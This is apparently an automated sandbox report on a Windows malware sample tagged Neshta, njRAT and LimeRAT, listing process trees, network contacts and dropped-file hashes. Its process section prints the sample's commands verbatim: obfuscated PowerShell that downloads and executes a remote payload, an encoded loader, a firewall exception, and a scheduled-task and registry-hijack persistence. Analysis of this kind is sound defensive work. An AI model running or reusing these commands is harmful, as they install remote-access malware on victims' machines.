Malware Analysis Report

2024-11-16 13:10

Sample ID 220524-d7kztsedf4
Target a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f
SHA256 a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f
Tags
neshta agilenet evasion persistence spyware limerat njrat hacked rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f

Threat Level: Known bad

The file a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f was found to be: Known bad.

Malicious Activity Summary

neshta agilenet evasion persistence spyware limerat njrat hacked rat trojan

Neshta

njRAT/Bladabindi

Detect Neshta Payload

Modifies system executable filetype association

Neshta family

LimeRAT

Modifies Windows Firewall

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Enumerates physical storage devices

Program crash

NSIS installer

Suspicious use of WriteProcessMemory

Modifies registry class

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-24 03:39

Signatures

Detect Neshta Payload

Description Indicator Process Target
N/A N/A N/A N/A

Neshta family

neshta

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-24 03:38

Reported

2022-05-24 03:42

Platform

win10v2004-20220414-en

Max time kernel

25s

Max time network

175s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

Signatures

Detect Neshta Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A

Neshta

persistence spyware neshta

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2816 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 2816 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 2816 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 3864 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 3864 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 3864 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 3184 wrote to memory of 2560 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 3184 wrote to memory of 2560 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 3184 wrote to memory of 2560 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 3864 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 3864 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 3864 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 3864 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 3864 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 3864 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 4780 wrote to memory of 3960 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe
PID 4780 wrote to memory of 3960 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe
PID 3864 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 3864 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 3864 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\script.js"

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE"

C:\Users\Admin\AppData\Roaming\images.exe

C:\Users\Admin\AppData\Roaming\images.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\scripts.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\svcripts.vbs"

C:\Users\Admin\AppData\Roaming\Sound.exe

C:\Users\Admin\AppData\Roaming\Sound.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Sound.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\images.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2560 -ip 2560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1052

C:\Users\Admin\AppData\Roaming\Data.exe

C:\Users\Admin\AppData\Roaming\Data.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Data.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1052

C:\Windows\SYSTEM32\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Data.exe" "Data.exe" ENABLE

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Monitor.exe'"

C:\Users\Admin\AppData\Roaming\Monitor.exe

C:\Users\Admin\AppData\Roaming\Monitor.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Monitor.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 88.221.144.179:80 tcp
NL 88.221.144.179:80 tcp
US 13.89.178.26:443 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
ES 81.61.77.92:8000 tcp
US 8.8.8.8:53 chopa.mywire.org udp
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 rnqkma.bn.files.1drv.com udp
US 13.107.42.12:443 rnqkma.bn.files.1drv.com tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 104.81.140.70:443 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:5553 tcp

Files

memory/3864-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

MD5 9bc3a910746cc9474e22bf5893b167af
SHA1 1ce4c754b9e94bd89e09dbd38071739ef276f91d
SHA256 a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00
SHA512 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

MD5 9bc3a910746cc9474e22bf5893b167af
SHA1 1ce4c754b9e94bd89e09dbd38071739ef276f91d
SHA256 a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00
SHA512 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/3216-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\LoL Checker Cracked by Aeris - Team Otimus.exe

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\odt\OFFICE~1.EXE

MD5 e9b6fb330ab88d47e81933f4220ebc40
SHA1 1a0946fe9492bcec0d7042173566629f5cd7f381
SHA256 12a4dc3d9756cf71f90304f0fabd48e972f6b64cd5dc9414036d1245116b2cbe
SHA512 15c22b0cb47d34ca2511a1cf781faf6fd02afe6b48a2ef0078e6344e995347b9f2b839926fc7ea8939491aabf96a7204dfa54f08ed1560f70b3444e0dabf12ff

memory/2560-137-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/3184-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

memory/4420-147-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

C:\Windows\directx.sys

MD5 b681422f35254a4040cc95d34543c7ef
SHA1 45522ff90230eae7c7f3d7843b954553a4b61004
SHA256 f5ba621473ff11b8461b3d8e250aa0470f760adf34de4692796b05f700a27aa4
SHA512 c60e0189f32d35da0c44191f03b25aaa05664a50a4b7ae4232727903dcd2476e353b618a5833e740ef9837ea13ec5f434ddf15da9e507cf0b734e973bbef7a94

memory/4068-149-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

memory/3808-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Users\Admin\AppData\Roaming\svcripts.vbs

MD5 c23ba5de4e95d79c987165773bd4710d
SHA1 f71c5d7761888a1747e4ab0310d31500002845e6
SHA256 d2b21945cdf209e4b38fa57f5a3bb24d4d4c5e670959f00d00c8e001ce9b0c09
SHA512 e115266d9189b297d672a9f2d13ba98d913cba3c90fc630cc14e5b1095c5f61dc1ca7d29c5083b66c02d79e93eadb95d411b849c6bc693184fd63205b454fcb1

C:\Users\Admin\AppData\Roaming\scripts.vbs

MD5 6bc888f264b6ad4e3cabda337ebdaf1b
SHA1 13f431ce35157695fae9c2ef4729ea478d17425f
SHA256 8adf34f5a2d889ce512e8620ba2828ed7932d077b36a2c3a5f89cafcd2d399bb
SHA512 44fe61c6d1ef1a1b678f555d689628d7a45be0460c93e4406a07316953da92672b7453a27cba1d16180da8d2067a0cdeb216b5eedfbf9de79afc6d6969187a37

C:\Users\Admin\AppData\Roaming\script.js

MD5 3f0b0592cd10d2383602a037c0baf51d
SHA1 4694d2da3f6f6cb8fac2ad064650dc801271b5d7
SHA256 1782a96b0ad9d16b692625c4219b2f96504c91578bfb1b5bc1a986da8f42a360
SHA512 01f26f84a4a003c68b7dec6e07b48423c398248a3c5751e91233fd472b3d8a827c482ff9348d856d740768ab0fd88d7ac75ab90f8ee6686dcf8442898b2e39ea

C:\Windows\directx.sys

MD5 04edcfd1f9ce40116f427a8094c914e9
SHA1 99d9e5390c12ff5fe4055bc6d0b3b0f80f4b08a7
SHA256 a791ef37ebd96055d88913449ed4db8084b958e22a4253afaec7d325206a7093
SHA512 44e68208a3f253f35fba470b53a6b98d8e5324cf80cfb934bfe165f6ce9bdf6ce413f387a77959633fc0c85dcc617aac5c6f34390ac5cee0b8bded57f547f50e

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/64-153-0x0000000000000000-mapping.dmp

memory/3960-148-0x00000000007E0000-0x000000000081A000-memory.dmp

memory/3960-145-0x0000000000000000-mapping.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/4780-141-0x0000000000000000-mapping.dmp

memory/3960-159-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp

memory/64-160-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/4460-168-0x0000000000000000-mapping.dmp

memory/2560-169-0x0000000000CD0000-0x0000000000CF0000-memory.dmp

memory/4616-167-0x0000000000000000-mapping.dmp

C:\Windows\directx.sys

MD5 50f22fccb8cf39d0625e0b4712d41cc5
SHA1 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35
SHA256 a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f
SHA512 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9

C:\Windows\directx.sys

MD5 50f22fccb8cf39d0625e0b4712d41cc5
SHA1 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35
SHA256 a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f
SHA512 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9

memory/4584-162-0x0000000000000000-mapping.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/3544-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b2731afa7807057bbbe61d21732a3206
SHA1 7a0e822b557fda59aa5b2c0275d293032fa40c47
SHA256 45dee80d2828fa28433d10f7f333c9e440f4682b1f3c89bdd4112b37ed32cbcc
SHA512 dda36acab2dbeb72fc96c5b5bc4f9273987c998d5b8a437a829a5c85ff2fa9f3640e85c92db32820fcc85e65f468a83936734926e39cdb6bd0069febb001e853

memory/4616-171-0x0000000002790000-0x00000000027C6000-memory.dmp

memory/2560-172-0x0000000005640000-0x00000000056D2000-memory.dmp

memory/4616-173-0x0000000004E40000-0x0000000005468000-memory.dmp

memory/4616-174-0x0000000004C70000-0x0000000004C92000-memory.dmp

memory/4616-176-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/4616-175-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/4616-177-0x0000000005B90000-0x0000000005BAE000-memory.dmp

memory/4652-178-0x0000000000000000-mapping.dmp

C:\Windows\directx.sys

MD5 50f22fccb8cf39d0625e0b4712d41cc5
SHA1 97f5c502e7e3ffb5e4db64bd32d49e12b3b3dd35
